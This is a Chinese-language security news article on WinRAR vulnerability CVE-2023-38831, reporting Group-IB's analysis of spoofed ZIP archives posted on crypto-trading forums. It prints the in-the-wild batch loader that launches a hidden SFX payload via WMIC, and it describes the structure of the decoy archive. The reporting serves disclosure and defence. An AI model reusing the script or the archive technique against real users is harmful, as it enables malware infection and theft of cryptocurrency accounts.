WinRAR再爆0 day漏洞

WinRAR再爆0 day漏洞，已被利用超過4個月。 

Winrar是一款免費的主流壓縮文件解壓軟件，支持絕大部分壓縮文件格式的解壓，全球用戶量超過5億。Group-IB研究人員在分析DarkMe惡意軟件時發現WinRAR在處理ZIP文件格式時的一個漏洞，漏洞CVE編號為CVE-2023-38831。攻擊者利用該漏洞可以創建欺騙性擴展的誘餌文件來隱藏惡意腳本，即將惡意腳本隱藏在偽裝為.jpg、.txt和其他文件格式的壓縮文件中，并竊取用戶加密貨幣賬戶。

研究人員在分析DarkMe惡意軟件時發現了一些可疑的ZIP文件。Group-IB在8個加密貨幣交易的主流論壇上發現了這些惡意ZIP文件，如圖1所示：

圖1. 交易論壇發布的帖子

CVE-2023-38831漏洞序列圖如圖2所示：

圖2. CVE-2023-38831漏洞序列圖

所有壓縮文件都是用同一方法創建的，結構相同，包括一個誘餌文件和一個包含惡意文件和未使用文件的文件夾。當用戶打開惡意壓縮文件后，受害者機會看到一個圖像文件和一個相同文件名的文件夾，如圖3所示。

圖3. 惡意zip文件示例

如果受害者打開偽裝為圖像的誘餌文件，惡意腳本就會執行攻擊的下一階段，如圖4所示：

圖4. 攻擊流程圖

腳本的主要作用是進入攻擊的下一階段，這是通過運行最小化窗口來完成的。然后搜索兩個特定文件“Screenshot_05-04-2023.jpg”和 “Images.ico”。JPG文件是受害者打開的圖像，“Images.ico”是用來提取和啟動新文件的SFX CAB壓縮文件。惡意腳本示例如下：

@echo off

if not DEFINED IS_MINIMIZED

 set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

 cd %TEMP%

 for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do

  for /F "delims=" %%G in ('dir /b /s "Images.ico"') do

   WMIC process call create "%%~G" && "%%~K" && cd %CD% && exit

Exit

為了解漏洞工作原理，研究人員創建了2個與發現的惡意壓縮文件結構相同的壓縮文件。兩個文件都包含圖像文件，其中一個壓縮文件中還包含一個存儲腳本的內部文件夾，可以觸發消息展示框。然后，研究人員修改了其中一個文件使其與惡意壓縮文件一樣。然后，比較WinRAR在解壓不同壓縮文件時的區別。

研究人員主要想確定在打開解壓文件時會在%TEMP%/%RARTMPDIR%文件夾中創建什么文件。在原始的zip文件中，只會創建image.jpg文件。在惡意文件zip文件中，其中的文件夾內容也會被提取。

圖5. 不同zip文件解壓比較

也就是說，攻擊發生在WinRAR嘗試打開用戶想要訪問的文件時。ShellExecute函數接收到了打開文件的錯誤參數。圖像文件名與搜索不匹配，引發其被跳過。然后就發現了批處理文件，并執行。

圖6 漏洞復現

8月15日該漏洞被分配了CVE編號，但該漏洞從2023年4月開始就被在野利用。研究人員建議WinRAR用戶更新到最新的v 6.23版本。